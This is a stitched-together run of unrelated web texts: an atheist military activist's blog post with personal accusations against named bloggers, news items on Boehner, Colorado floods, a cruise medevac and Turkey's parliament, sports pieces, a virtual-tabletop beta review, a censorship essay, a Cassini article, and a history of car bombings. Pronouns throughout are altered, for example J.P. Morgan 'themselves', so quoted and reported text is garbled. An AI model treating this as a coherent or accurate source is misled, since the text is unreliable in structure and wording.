As a foxhole atheist, I want nothing more than equal treatment. I just want a seat at the table. Atheists are just now beginning to break through the stained glass ceiling in the US military. I even spearheaded a damn festival on the front lawn of several generals, with Richard Dawkins and Aiden headlining as children ‘walked on water' (and corn syrup) in front of the Fort Bragg chapel.
Have you heard the commercial? We aired *this* hundreds of times on various radio stations. We even snuck it in during an episode of Sean Hannity's talk radio program.
No idea why it was yanked from that station after the first play. 🙂
It was the first meaningfully endorsed atheist meeting allowed on a US Military base. Still our internet presence was blocked on several other bases (or worse – publicly accused by an Army captain of endorsing arson aimed at chapels during our festival.)
Rock Beyond Belief started as a festival. It got far more attention as a blog. It became a vehicle for empowering other foxhole atheists to overcome a variety of issues. My advocacy was pretty much in some level of news coverage several times a week. Military policies were changed. Justice was often granted. Issues were getting solved. Of course that would have consequences for me personally. I expected it, that's why I sprinted towards the gunfire while I could. On the other hand, I was marched into many general's offices with no explanation, only to find out that they wanted to shake my hand and tell me what screen name they used to comment on my blog!
We're hoping that by moving the blog to Patheos – an interfaith site – they'd have to ban similar theistic content to silence us (and choose not to). Perhaps we'll have to accept our fate as internet vagabonds to reach fellow service members. Maybe we'll move again every few years.
Why the recent radio silence?
The breakneck pace for my advocacy had consequences. It was not sustainable. I don't want to discourage any of my brothers and sisters from speaking out, but I was over-the-top (with no regrets). I brought several dozen issues to the media, not just one. Most were corrected immediately, despite the endless exhaustion of internal channels. I will never be able to explain fully why I can't participate anymore, but I've attempted to explain in an extremely watered-down version a few weeks back at Ellenbeth Wach‘s.
Paul Loebe stepped up and picked up right where I left off. They likely will never be able to reveal the full consequences he's faced either. I'm so proud of them and he's been doing an excellent job as the new Military Director of American Atheists. I'm still in close contact with him, and I'm helping with some advocacy / advice where I can.
Loebe's a machine. He's going to move mountains, but as with all foxhole atheists speaking out, he's going to need your help from time to time. So please subscribe / like / follow them closely, and look out for letter-writing campaigns and the like. That stuff works more often than you think.
It feels like I'm forgetting something…
PZ Myers is the only really massive draw to FtB.
It's no secret that Greg Laden was shit-canned from FtB for their violent threats against me. Do you remember the way PZ Myers handled the situation? They posted a public hand-washing of *me* over the disclosure of Laden's vile words. Always name names (unless it's when our bff's do it?)
Staying at FtB after being publicly renounced by the only major draw to the blog network…? Fuck that.
He's also a fake. PZ has a “Trophy wife”, has used ‘gendered slurs' multiple times, such as endorsing the phrase “Science, it works bitches!” as great motto for scienceblogs, etc. Why people think he's a super feminist ally is beyond me. If he's only converted to this brand of feminism recently, then why all the overblown hatred for people making the same mistakes he's made several times? Can't they too come around?
I recently left this brief summary elsewhere.
Looking for news you can trust?
Subscribe to our free newsletters.
Susan Davis and Major Garrett describe John Boehner's reaction after losing a floor vote because 48 Republicans refused to vote for it:
Boehner was described as “spitting nails” during a closed-door member meeting on Wednesday, and their harsh talk demonstrated that the usually unflappable speaker is reaching something close to a breaking point with their internally divided conference. Those close to Boehner said there is a growing anger in the leadership that some in the first-year student class and other intractable conservatives pay no mind to the legislative dangers of abandoning leadership—especially at a time when Democrats feel as if they and President Obama are fighting for their political lives. ….In private, Boehner has grown tired of what they dismissively call the “know-it-alls who have all the right answers.” Boehner knew what a defeat would mean—a more costly spending bill, one that provides more emergency disaster relief and contains fewer budget offsets.
It was all kind of fun back when these guys were threatening the financial reputation of the country over the debt ceiling, wasn't it? Of course, that's because it seemed like President Obama might get the blame, and wrecking our credit rating was well worth it as long as it cost Obama a few points in the polls. But guess what? People with that kind of glassy-eyed fervor aren't especially reliable allies. I guess Boehner is finally figuring that out.
In Colorado, rainfall characterized by the National Weather Service as "biblical" has left thousands homeless, hundreds missing and at least eight people dead. Among the hardest-hit cities has been Boulder, which last week catapulted from a dry spell into its wettest year on record in the span of just five days.
The flooding in Colorado is expected to continue as forecasts are predicting more rain Monday. This …
Via Climate Central's Andrew Freedman:
With 30.14 inches of rain and counting, more than half of which fell since Sept. 9, the city has already eclipsed its previous mark of 29.93 inches, set in 1995. Boulder's average yearly precipitation (rain and melted frozen precipitation) is 20.68 inches.
The record is especially noteworthy since before Sept. 9, Boulder, along with much of eastern Colorado, was still mired in long-term drought conditions
This morning the United States Coast Guard medevaced a 23 year old passenger from the cruise ship, Royal Caribbean's Vision of the Seas, according to a Baton Rouge news station.
The young woman was suffering from "suspected internal bleeding from a prior incident." It is less than clear what prior incident the news account is referring to.
The cruise ship was reportedly 100 miles south of Southwest Pass, Louisiana when the Eighth Coast Guard District launched a helicopter and a HC-144 Ocean Sentry aircraft to assist in the rescue of the woman.
The Coast Guard said the helicopter aircrew arrived on scene at 10 a.m. this morning and took the woman from the cruise ship to Jefferson Medical Center in New Orleans where the woman was reported to be in stable condition.
Photo credit: Defense Video Imagery Distribution System (DVIDS) Photo by Petty Officer 3rd Class Brandon Giles, U.S. Coast Guard District 8.
Paartalu - a standout for Thai Premier League leader Muang Thong United in their 19 appearances this season - is expected to make a decision on their future by the end of the week as Newcastle Jets and two other Australian clubs wait in the wings.
The 28 year-old's Sydney-based agent David O'Keefe dismissed newspaper reports that the domineering midfielder had already agreed terms with Newcastle Jets and would be announced imminently as its latest capture, insisting that any discussions were at an "embryonic stage".
"There has been a phone call from Newcastle and that's about it as this stage but the reality is their current club are happy with them and they are quite keen to extend and there's no truth that they have agreed terms with anybody," O'Keefe said.
"There are also two other teams interested in Australia, one from Sydney and one from Melbourne, as well as the interest from Japan from a club they came close to joining in January.
"But there is nothing formal on the table from anyone at this stage."
Contracted with Muang Thong until December, Paartalu – who is also attracting interest from Japanese second division outfit Jubilo Iwata - has been informed by Australia coach Ange Postecoglou that they must leave Thailand to have any hope of adding to their two Socceroos caps with the 2015 AFC Asian Cup looming.
"Erik will make their mind up on their future in the coming days and they know that by coming back to Australia they will enhance their chances with the national team," O'Keefe said.
"He wants to be considered again for their country and that will be factored in any decisions they make."
Paartalau signed for Muang Thong seven months ago after a season with Chinese Super League side Tianjin Teda. Until two weeks ago had played every game for the Thai side, before being sidelined with a quad injury.
 They are expected to be fit again within the next 10 days.
I just got done with my first game using the Virtual Table and thought I should share some of my thoughts. First of all I have to throw out a huge thanks to Trevor Kidd and Mike Robles for making it possible for all the players in my game including me to take part in the Beta.
I was so excited to get my beta invite I did what I always do, I jumped in and got a group together to play. I set aside forty minutes to whip up an adventure. At the end of my forty-minute cram session I had four encounters built with five different enemy types. The lack of monster import had me spending most of my time entering monster stats and attacks.
This will be a group post allowing many of the people who took part in my game to add their thoughts and recommendations.
Thadeous:
I'll make this short and sweet so others can give their thoughts and impressions. I'll add them to this post through out the day. My overall experience was awesome; I spent a lot of time saying “I wish they had added this feature” only to find it a few minutes later. We had a few connection issues but for the most part once it was up and running we really didn't have any disconnects or running problems.
Things done well: Incorporation of dungeon tiles is great! Being able to build a huge map out of tiles is something I only get to do so often. Most of the time my players only get to see one room or so of tiles since my table is only so big and it takes a bit more time that I usually have to put together multiple maps.
Creating the rooms with the tiles was quick and easy. The selection was not huge but it's beta so I wasn't expecting them to include every published set. With in 15 minutes I had a decent sized map with some interesting terrain whipped up and ready to go.
Blasts/Bursts/Zones could all be made by players in their own colors. They can last until the players or the DM delete them. Notes can be added to the game map so players and the DM can tell what the blast or zone is.
The initiative tracker is easy to use and self sorting. Adding and removing entries was quick and easy.
There is a journal tool included, possibly one of my favorite tools.
Voice Fonts! Voice filters each player or DM can add to change the way they sound. For a DM like me who sucks at voices these are gonna be fun and get some mileage in my games.
Monster tracking was simple with the ability to add marks, bloodied status and free spaces for any other conditions powers might cause.
What I would change:
Everyone is thinking it and some people have said it and so will I: Character & Monster imports.
The line of sight tool should be visible to the DM and players. This would allow discussion about LOS issues and rules to take place with everyone on the same page.
Character exporting is functional but not very intuitive, placing it on the navigation bar might help solve this issue.
Including the ability to create custom tokens or import tokens could really help the over all experience.
The blast/burst/zone creator could use visible tags, and the colors could be a bit darker. Mouse over information would be really useful; including the creators name and the effect would be nice.
Allowing customization of the lay out would also be nice. It's a really functional setup but I know people love to set their own design. I like having a chat panel on the left side of my screen and so on. Being able to set up my desktop as I wish would be fun.
Being able to set up cover and line of sight restrictions before the battle and letting the map calculate the effect would be nice.
A sound or alarm on critical rolls would be nice. I often found my self looking at the sum of the rolls and the modifiers and not the actual dice rolls so I missed it almost every time the players rolled a crit.
All in all this looks like a seriously good map tool. To think it's all hosted online is freaken awesome! I can't wait to see how it all links up with the other tools they have built and are building. I'm even considering bringing the virtual table into my home game.
DreadGazebo – Well Thadeous it looks like you've really about covered it but I'll quickly add my two cents by just saying even though entering your PC's in by hand is a bit arduous it was really rewarding to actually get to play, I had a blast! Once this goes live, the fact that all the monster/PC files are exportable and there is a “template” feature I'm sure the community will have things covered in no time and setup times will probably be reduced considerably, perhaps even WotC would release some for us, or include the files with the adventure articles they publish in DDI.
I also think you've covered most of the points brought up in my notes, except for it would be nice if you could change your token icon mid stream, but I think the easy fix for that would be to create a new character and import its crunch from your already existing one and then just swap the icon. Dice roll sounds would be cool too but thats a minimal thing that may annoy some people, but it could always be a toggled option, as would an on/off for the language filter in chat. I was also curious if the random number generator was on the server side or client side after Thadeous rolled 3 1's in a row and Psychopez managed to score 2 or 3 crits in a row, lol.
Overall I was really pleased with what I've seen so far, being able to customize the UI a bit more would be nice (undockable panels, adjusting the size of frames/windows, color schemes) but it was really solid otherwise. I think WotC is definitely on the right track here and I can't wait to use the VT more and see what develops in the coming weeks/months. And once again I'd like to give huge thanks to Trevor and anyone else from WotC who contributed to making it possible!
I'm currently putting together a tutorial video for release later today that will go over the tables features and capabilities for everyone to take a glimpse of as well, stay tuned 🙂
DeadOrcs – I won't have a whole lot to say here. Thadeous & DreadGazebo seem to have covered most of the things that I noted during my experience. I want to echo Thadeous' thanks to Trevor Kidd & Mike Robles for allowing us Beta invites on such short notice. Trevor & Mike? Make Thadeous bring you an expensive bottle of wine or something.
For a closed Beta, I was pretty impressed with what had been accomplished so far with the tool. Game play was actually smooth, with very little lag. I was most impressed with the voice handling. Audio takes a bunch of bandwidth, and (at least for the beta) the servers on WotC's side seem to handle it in stride.
Things I'd like to see? Well, to echo the now LOUD & CLEAR message, the tool should have an import. I know parsing whatever text comes out the Character Builder (and/or Monster Builder) won't be a glamorous job, but if you make it work, the tool will be head & shoulders over it's competitors. One final request? Let us customize the tokens. Even if you can't keep them on the server, allow us access to the file type, so that we can upload our own. It'll go a long way to prevent the appearance of the tool from becoming “generic-looking”.
I look forward to testing out the DM side of the tool in the upcoming weeks. Thanks again, to everyone that helped us with the VT test!
Psychopez (RPGmusings.com)
The WotC VT surprised me a bit, to be honest. I was expecting a basic table with software that allowed token movement. I was rather impressed at how easy it was to create a map using the dungeon tiles, making maps is going to be a lot easier in VT then other virtual tables. The built-in voice chat and voice fonts was real nice. It was much more stable and clearer than Skype, and having the voice and game table all in one app was a lot more streamlined then the current process of having Skype/Vent in one program and your game table of choice in another.
The downsides are the powers. Even when character input is in place, the way the powers work in game is lacking. I expect a little more information to be displayed in the chat window when you click on a power. It's still possible, but the templates, and what I would assume the default set up on import, allow only for the actual dice values rolled. Extra text on a hit, miss, effects, and after effects won't show up in the chat, which I think is something that would speed up game play. I have other nitpicks (I don't like that to roll dice I have to drag the dice in and out of a box, then click on the roll dice, rather than just typing something in) but they're minor.
All in all, it's good software, especially for a beta, but from what I see there is a lot lacking in what I personally desire from a virtual table. I want more power under the hood, more ways to customize and automate a lot of the processes and math that are better for a computer to do then a human, and it looks like WotC will keep much of that under the wraps. That said, the VT looks like it's going to be really good for those who either don't want or need all the bells and whistles or are just getting into using virtual tables for the first time and want something that, when import monster and characters is done, will be ideal for starting up and getting a game going with minimal start up time.
Thadeous can't think of anything interesting about them self right now. Know this though if they could it would be creative and funny as well as thought provoking.
by Gabriella Paiella
No body part inspires puritanical pearl-clutching in decent Americans quite as much as the humble nipple. Ten years ago, Janet Jackson slipped the nipple heard ‘round the world, prompting comic levels of outrage and morality policing. This summer, the MPAA banned Eva Green's Sin City 2 poster for hinting at the possible existence of a nipple through their sheer robe. In between, there was a decade's worth of similar incidents regarding this particular brand of anatomical exposure:
Janet Jackson at Super Bowl XXXVIII
The nipple-baring that started the national conversation about wardrobe malfunctions took place at the 2004 Super Bowl XXXVIII halftime show. When Justin Timberlake dance-ripped Jackson's top, viewers caught a glimpse of Jackson's nipple for 9/16th of a second. 1.4 million people went on to complain to the Federal Communications Commission about the supposedly indecent exposure. (Yes, Americans complained more about 9/16th of a second of nipple on CBS rather than the 10+ years of Two and a Half Men they've been airing.) CBS was fined $550,000 by the FCC, and Jackson's career arguably suffered after the fact. Timberlake is doing just fine for himself.
Nancy Grace on Dancing with the Stars
In 2011, justice-seeker Nancy Grace's Dancing with the Stars routine ended up exposing one of their nipples briefly — as one can do when partaking in a vigorous physical activity while wearing a deep-cut dress. Grace vehemently denies it to this day. Meanwhile, contestants are getting entirely naked on Dancing with the Stars' equivalent in Argentina.
The New Yorker on Facebook
When Mike Stevens posted a cartoon (below) on The New Yorker's Facebook page in 2012, the magazine was temporarily banned from the site for violating their terms of service.
As Bob Mankoff explained:
“Some sleuthing showed that the offense was actually caused by the inclusion of these two dots in the cartoon,
which, by the way, also contained these two non-offending dots.”
Now, we all know that The New Yorker is a filthy rag staffed by smut peddlers, but Facebook seemingly overreacted with this one.
Rihanna on Instagram
Earlier this year, musician and noted friend-of-the-nipple Rihanna posted a photo of their topless Lui magazine cover on their Instagram account. When Instagram pulled the photo for violating their terms of service, they deleted their entire account. The world still has not recovered from the loss of Bad Girl Ri Ri.
Grace Coddington on Instagram
Grace Coddington was recently suspended from Instagram for this drawing, below. It's my personal favorite of the bunch because, well, look at it. Downright pornographic.
Eva Green
In late May of this year, the MPAA pulled Eva Green's Sin City 2 poster for hinting at an outline of nipple. It's visible if you squint really, really hard.
+++
These are just a few notable incidents. Even for people whose sensibilities aren't quite so easily offended, Google searching “nip slip” will yield over 1.5 million results. You haven't lived until you've clicked through a 41-photo gallery, each picture showcasing entire centimeters of celebrity areola.
The public fixation on nipples — outrage or otherwise — is entirely illogical. It's acceptable to pose in sexually suggestive positions and show every other bit of breast surface area, but it's that one small dot that throws everything off kilter.
Plus, nipples are everywhere. I even started furiously typing “half the population has them!!!” but, hey, joke's on me: Everyone has nipples. And save for the formula-reared, we've all sucked a teat or two back in the day.
I have to wonder if people who are truly offended or intrigued by a hint of nipple on public television, Facebook, or Instagram know that anyone with a decent Internet connection can easily view not only nipples, but every orifice available stuffed with all sorts of things.
Looking back on Jackson's initial incident, it's embarrassing how great the fallout was from it. Ten years later, not much has changed. Here's to less attention paid when someone has a “wardrobe malfunction,” and for social networks to consider nudity and terms of service more thoughtfully. And, for the love of god, here's hoping we get Rihanna's Instagram back.
[image via WN]
Gabriella Paiella writes (and tweets) from Brooklyn. Yes, their name rhymes.
Geese to be Removed from Local Park
There's a boom in geese in two local parks.
Now the foul will have to find a new home.
Hemlock Park and Northend Park in Big Rapids both have between 50 and 100 geese.
The city says that number is growing.
People have been complaining about the droppings left by all the birds. So a silenced goose handler will come to Big Rapids in the next few weeks to cage the geese and take them away.
“The geese will not be hurt,” Big Rapids Parks and Recreation Director Heather Bowman said. “She has cages and they're to a certain size criteria based on the DNR's wildlife biologist criteria that they create, so we'll make sure they get out in a new home and lead happy healthy lives.”
The geese will be released somewhere in Northern Michigan designated by the DNR.
Comments
comments
Emily Lakdawalla • September 15, 2016
One year remains in the Cassini mission
Cassini has been orbiting Saturn for as long as I've been a science writer. From the time of its orbit insertion in June 2004, Cassini was the first regular beat I was asked to cover as a writer at The Planetary Society. So it's especially hard for me to confront the fact that this long, wonderful mission is just about over. A year from today, it's going to plunge into Saturn.
The mission must end because it is nearly out of fuel. Originally planned to last 4 years in orbit, the mission was extended twice to cover Saturn over a total of half of its year around the Sun. Cassini arrived at the height of southern summer, and has watched as the Sun set on the South Pole and rose on the North Pole. The mission will see Saturn go through northern summer solstice before it ends.
The final year is going to be an exciting one. On November 29, a flyby of Titan will drop Cassini's closest approach to Saturn to a point just 10,000 kilometers beyond the F ring. Cassini will be able to study the weird phenomena of Saturn's rings and ringmoons closer than ever before, and will travel to never-before-sampled regions of Saturn's magnetic field. Then, on April 22, 2017, a final targeted flyby of Titan will shift Cassini's periapsis to a point between the innermost D ring and Saturn. On each close approach to Saturn, it'll fly within 3800 kilometers of the cloud tops. Cassini will see the planet, rings, and energetic particle environment from a new perspective, and have the first ever opportunity to measure the masses of the ring system and Saturn separately. A final nudge by distant Titan on September 15, 2017, will send Cassini to its death.
NASA / JPL Cassini's F ring and proximal ("Grand Finale") orbits Near the end of its mission, Cassini will reduce its periapsis to come close to the F ring for 20 orbits (green) and then dive between Saturn and the D ring (blue) in the F ring and "Grand Finale" phases of the mission. Periapse happens at local noon on Saturn, providing the best possible gravity measurements, in order for Cassini to study the mass of the rings and the internal structure of Saturn, much as Juno will be doing at Jupiter at the same time. Near the end of its mission, Cassini will reduce its periapsis to come close to the F ring for 20 orbits (green) and then dive between Saturn and the D ring (blue) in the F ring and "Grand Finale" phases of the mission. Periapse happens at local noon on Saturn, providing the best possible gravity measurements, in order for Cassini to study the mass of the rings and the internal structure of Saturn, much as Juno will be doing at Jupiter at the same time.
This final year of Cassini's mission will actually look an awful lot like the Juno mission -- a spacecraft in a studying the inner workings of a giant planet from a polar, elliptical orbit that passes very close to the planet at periapsis. Except that Cassini carries a much larger (albeit older-tech and more-worn) instrument package. The fact that we'll have two spacecraft operating similar missions at different planets at the same time in the same solar environment will multiply our ability to understand how stars influence the physics of giant planets, and how giant planets work more generally. Basically, this final year of the Cassini mission will be like a whole New Frontiers mission tacked on to the end of a flagship mission. It's going to be awesome.
The awesomeness of the approaching final year of Cassini makes it hard to stay sad about its inevitable end. But once it does end, there'll just be Juno left studying the giant planets, the last of a long line of missions that began with the Pioneers. Once Juno ends, likely sometime in 2018, there's going to be a gap in which no mission will be operating or even on the way to any of the giant planets.
And now I'm sad again!
NASA / JPL-Caltech Cassini's Grand Finale Artist's concept of Cassini passing between Saturn's rings and the planet during the final phase of the mission. In the background is orange Titan, whose gravity will nudge Cassini into Saturn impact on September 15, 2017. Artist's concept of Cassini passing between Saturn's rings and the planet during the final phase of the mission. In the background is orange Titan, whose gravity will nudge Cassini into Saturn impact on September 15, 2017.
Emily Lakdawalla Senior Editor and Planetary Evangelist for The Planetary Society
Read more articles by Emily Lakdawalla
Formula E bosses had announced plans for Roborace – a championship for driverless cars to showcase new technology.
But the proposal has drawn scepticism from Wolff, who thinks that while the technology will become commonplace on the roads, it is not something that should be put to use on circuits.
“Autonomous driving is going to eventually happen on the road with road cars, and is going to make our lives easier,” said Wolff.
“And that is the way that technology goes. We are all here mostly because we like to see racing drivers racing each other in machines that are fascinating to watch.
"So that is not at all what I would consider a sport; it is a technology or R&D playing field.”
When asked if Mercedes was interested in driverless technology, Wolff said: “On roads yes. Not on the race tracks”
Human interest
FE boss Alejandro Agag conceded themselves that fans may not get too excited at seeing driverless cars competing against each other.
"I think people will always want to see human beings race each other - since the time of the Romans or before we've been seeing that. And we will see that in the future,” they said.
"But this is a different kind of challenge. This is an invitation to companies to really raise to the challenge and put their technology on a platform that will show that driverless technology can race in extreme conditions."
Arsenal's attack is right up there with Man City's as open play kings. 70% of the Gunners expected goals (xG) come that way.
Conversely, only 25% of Burnley's xG comes from open play. They are heavily reliant on set pieces. Sean Dyche's men are the second worst attacking side in the league.
Arsenal's defence at set pieces looks weird in the numbers. They've conceded hardly any xG from corners but are one of the worst in the league at defending free kicks slung into the box.
The issue will obviously be whether Burnley can win enough set pieces to cause Arsenal a problem. On top of this, it looks like Burnley's dead ball man Johann Gudmundsson is unavailable through injury.
Arsenal like to get into the box to create chances even more than City do. Pierre-Emerick Aubameyang and Aaron Ramsey lead the way here. Because of this fairly rigid attacking style, Arsenal create the best/most clear-cut on-the-deck chances of any team on average. Phil Bardsley is an ‘interesting' choice for Dyche to put up against Aubameyang.
Interestingly, Ramsey doesn't start today. Emery may be preferring some patience, might just be rotating due to the heavy Xmas schedule or may have had an inkling of Burnley's new set up (below). Although Burnley no longer bunker as much as they used to, Arsenal's possession hog will see The Clarets revert to type. You'd have thought Ramsey would be ideal today, especially as Arsenal don't threaten much aerially.
Burnley looks to have forfeited wide attackers in favour of three CBs and full backs charged to push on when they can. Dyche has chosen to pick 3 narrow central midfielders and two target men up top. Again, how Bardsley copes with no-one directly in front protecting them will be a good watch. Big Phil is not known for their patience or their inability to take no prisoners if riled.
I'm interested to see Chris Wood in attack for Burnley feeding off the scraps and trying to bully Arsenal's back line. Wood is mobile for their size and is behind on xG this season. Ashley Barnes gets the nod over Sam Vokes. This might be due to the lack of Gudmundsson as Vokes gets most of their xG from set pieces whereas Barnes has been more of an open play threat.
Difficult to see anything other than a hiding for Burnley. However, Christmas is a time for miracles, non?
Advertisements
In the smallest of Florida towns a lone well driller, Joe, works gathering geological samples for a university study. Unknowingly, Joe unearths more than just primordial muck from deep below the swamp. A strange oozing liquid, is absorbed into Joe's skin and slowly transposes their sense of pain and pleasure. Unaware that they are now a victim and carrier of a horrible virus, Joe lingers in town a few extra days to woo the town's pretty diner waiter, Maria. Allen, a weekly town visitor and long time suitor of Maria's, is unaware of Joe's romantic interest. When Allen's frequent visits to see Maria are delayed by work, Allen must make a final decision to quit their job and propose to Maria or break off their relationship. When Allen makes the decision to move to Ochopee and marry Maria they arrive to find the town a changed place. Maria, often hinting at marriage, is no longer interested and somehow a darker, sullen woman. Other townspeople are nowhere to be found. Pretty storefronts are now... Written by Jozef Lenders
Linebacker Thomas Davis will be back in the Panthers lineup on Sunday after serving a one-game suspension for a blindsided block to the head of Packers wide receiver Davante Adams, but he's not done talking about the reaction to that hit.
Davis apologized to Adams on Twitter after Adams accused them of headhunting, but they said Thursday that they take issue with those who think that the hit makes them a dirty player.
“It's very unfair,” Davis said, via ESPN.com. “I've seen a lot of stuff that's being said. Obviously, people are going to form their own opinions based on what they saw. At the end of the day, I know for 13 years I've played the game the right way. I can rest easy on it.”
Davis was also fined $48,620 for a hit on Buccaneers wide receiver Adam Humphries earlier this season and that elicited some of the same reaction. Coach Ron Rivera backed up Davis Thursday, saying the veteran is a “physical player” without being a dirty one.
Whatever the label people choose for Davis, Rivera and the rest of the Panthers will be happy to have them back as they try to beat the Falcons and put together a long stay in the postseason.
ISTANBUL — Turkey's Parliament met through the night, Friday into Saturday, and passed a controversial new bill that gives the government greater control over the judiciary — but not before a brawl on the floor of the assembly left one lawmaker with a broken finger and another with a bloodied nose.
The raucous scene, as well as the fisticuffs that broke out during a previous debate on the bill, was emblematic of the messy turn Turkish politics has taken recently, as a corruption investigation targeting Prime Minister Recep Tayyip Erdoğan and their inner circle has thrust the government into crisis.
Critics charged that the judicial bill is the latest attempt by Mr. Erdoğan to survive the corruption investigation. Experts say the legislation, which still needs to be signed by the president and is sure to face challenges in the constitutional court, would eviscerate any measure of a separation of powers in the Turkish political system.
Mr. Erdoğan has blamed the investigation on supporters of the Islamic cleric Fethullah Gulen, who lives in exile in Pennsylvania and whose followers have, over the years, built up deep influence in Turkey's police and judiciary. The prime minister has referred to Mr. Gulen's followers as a “parallel state” that has engineered the graft inquiry to overthrow the government and has reassigned thousands of police officers and hundreds of prosecutors to lesser posts.
This weekend's attempted Times Square bombing reminded us of the dangers of "the workhorse of urban terrorism" — the car bomb. Mike Davis gave TomDispatch this history of the first modern car bomb, mere miles from Times Square. —Ed.
Advertisement
Buda's Wagon (1920)
"You have shown no pity to us! We will do likewise. We will dynamite you!
— Anarchist warning (1919)
On a warm September day in 1920, a few months after the arrest of their comrades Sacco and Vanzetti, a vengeful Italian anarchist named Mario Buda parked their horse-drawn wagon near the corner of Wall and Broad Streets, directly across from J. P. Morgan Company. They nonchalantly climbed down and disappeared, unnoticed, into the lunchtime crowd. A few blocks away, a startled postal worker found strange leaflets warning: "Free the Political Prisoners or it will be Sure Death for All of You!" They were signed: "American Anarchist Fighters." The bells of nearby Trinity Church began to toll at noon. When they stopped, the wagon — packed with dynamite and iron slugs — exploded in a fireball of shrapnel.
Advertisement
"The horse and wagon were blown to bits," writes Paul Avrich, the celebrated historian of American anarchism who uncovered the true story. "Glass showered down from office windows, and awnings twelve stories above the street burst into flames. People fled in terror as a great cloud of dust enveloped the area. In Morgan's offices, Thomas Joyce of the securities department fell dead on their desk amid a rubble of plaster and walls. Outside scores of bodies littered the streets."
Buda was undoubtedly disappointed when they learned that J.P. Morgan themselves was not among the 40 dead and more than 200 wounded — the great robber baron was away in Scotland at their hunting lodge. Nonetheless, a poor immigrant with some stolen dynamite, a pile of scrap metal, and an old horse had managed to bring unprecedented terror to the inner sanctum of American capitalism.
Their Wall Street bomb was the culmination of a half-century of anarchist fantasies about avenging angels made of dynamite; but it was also an invention, like Charles Babbage's Difference Engine, far ahead of the imagination of its time. Only after the barbarism of strategic bombing had become commonplace, and when air forces routinely pursued insurgents into the labyrinths of poor cities, would the truly radical potential of Buda's "infernal machine" be fully realized.
Advertisement
Buda's wagon was, in essence, the prototype car bomb: the first use of an inconspicuous vehicle, anonymous in almost any urban setting, to transport large quantities of high explosive into precise range of a high-value target. It was not replicated, as far as I have been able to determine, until January 12, 1947 when the Stern Gang drove a truckload of explosives into a British police station in Haifa, Palestine, killing 4 and injuring 140. The Stern Gang (a pro-fascist splinter group led by Avraham Stern that broke away from the right-wing Zionist paramilitary Irgun) would soon use truck and car bombs to kill Palestinians as well: a creative atrocity immediately reciprocated by British deserters fighting on the side of Palestinian nationalists.
Vehicle bombs thereafter were used sporadically — producing notable massacres in Saigon (1952), Algiers (1962), and Palermo (1963) — but the gates of hell were only truly opened in 1972, when the Provisional Irish Republican Army (IRA) accidentally, so the legend goes, improvised the first ammonium nitrate-fuel oil (ANFO) car bomb. These new-generation bombs, requiring only ordinary industrial ingredients and synthetic fertilizer, were cheap to fabricate and astonishingly powerful: they elevated urban terrorism from the artisanal to the industrial level, and made possible sustained blitzes against entire city centers as well as the complete destruction of ferro-concrete skyscrapers and residential blocks.
Advertisement
The car bomb, in other words, suddenly became a semi-strategic weapon that, under certain circumstances, was comparable to airpower in its ability to knock out critical urban nodes and headquarters as well as terrorize the populations of entire cities. Indeed, the suicide truck bombs that devastated the U.S. embassy and Marine barracks in Beirut in 1983 prevailed — at least in a geopolitical sense — over the combined firepower of the fighter-bombers and battleships of the U.S. Sixth Fleet and forced the Reagan administration to retreat from Lebanon.
Hezbollah's ruthless and brilliant use of car bombs in Lebanon in the 1980s to counter the advanced military technology of the United States, France, and Israel soon emboldened a dozen other groups to bring their insurgencies and jihads home to the metropolis. Some of the new-generation car bombers were graduates of terrorism schools set up by the CIA and Pakistani intelligence (the ISI), with Saudi financing, in the mid-1980s to train mujahedin to terrorize the Russians then occupying Kabul. Between 1992 and 1998, 16 major vehicle bomb attacks in 13 different cities killed 1,050 people and wounded nearly 12,000. More importantly from a geopolitical standpoint, the IRA and Gama'a al-Islamiyya inflicted billions of dollars of damage on the two leading control-centers of the world economy — the City of London (1992, 1993, and 1996) and lower Manhattan (1993) — and forced a reorganization of the global reinsurance industry.
Advertisement
In the new millennium, 85 years after that first massacre on Wall Street, car bombs have become almost as generically global as iPods and HIV-AIDS, cratering the streets of cities from Bogota to Bali. Suicide truck bombs, once the distinctive signature of Hezbollah, have been franchised to Sri Lanka, Chechnya/Russia, Turkey, Egypt, Kuwait, and Indonesia. On any graph of urban terrorism, the curve representing car bombs is rising steeply, almost exponentially. U.S.-occupied Iraq, of course, is a relentless inferno with more than 9,000 casualties — mainly civilian — attributed to vehicle bombs in the two-year period between July 2003 and June 2005. Since then, the frequency of car-bomb attacks has dramatically increased: 140 per month in the fall of 2005, 13 in Baghdad on New Year's Day 2006 alone. If roadside bombs or IEDs are the most effective device against American armored vehicles, car bombs are the weapon of choice for slaughtering Shiite civilians in front of mosques and markets and instigating an apocalyptic sectarian war.
Under siege from weapons indistinguishable from ordinary traffic, the apparatuses of administration and finance are retreating inside "rings of steel" and "green zones," but the larger challenge of the car bomb seems intractable. Stolen nukes, Sarin gas, and anthrax may be the "sum of our fears," but the car bomb is the quotidian workhorse of urban terrorism. Before considering its genealogy, however, it may be helpful to summarize those characteristics that make Buda's wagon such a formidable and undoubtedly permanent source of urban insecurity.
First, vehicle bombs are stealth weapons of surprising power and destructive efficiency. Trucks, vans, or even SUVs can easily transport the equivalent of several conventional 1,000-pound bombs to the doorstep of a prime target.
Advertisement
Moreover, their destructive power is still evolving, thanks to the constant tinkering of ingenious bomb-makers. We have yet to face the full horror of semi-trailer-sized explosions with a lethal blast range of 200 yards or of dirty bombs sheathed in enough nuclear waste to render mid-Manhattan radioactive for generations.
Second, they are extraordinarily cheap: 40 or 50 people can be massacred with a stolen car and maybe $400 of fertilizer and bootlegged electronics. Ramzi Yousef, the mastermind of the 1993 attack on the World Trade Center, bragged that their most expensive outlay was in long-distance phone calls. The explosive itself (one half ton of urea) cost $3,615 plus the $59 per day rental for a ten-foot-long Ryder van. In contrast, the cruise missiles that have become the classic American riposte to overseas terrorist attacks cost $1.1 million each.
Advertisement
Third, car bombings are operationally simple to organize. Although some still refuse to believe that Timothy McVeigh and Terry Nichols didn't have secret assistance from a government or dark entity, two men in the proverbial phone booth — a security-guard and a farmer — successfully planned and executed the horrendous Oklahoma City bombing with instructional books and information acquired from the gun-show circuit.
Fourth, like even the 'smartest' of aerial bombs, car bombs are inherently indiscriminate: "Collateral damage" is virtually inevitable. If the logic of an attack is to slaughter innocents and sow panic in the widest circle, to operate a "strategy of tension," or just demoralize a society, car bombs are ideal. But they are equally effective at destroying the moral credibility of a cause and alienating its mass base of support, as both the IRA and the ETA in Spain have independently discovered. The car bomb is an inherently fascist weapon.
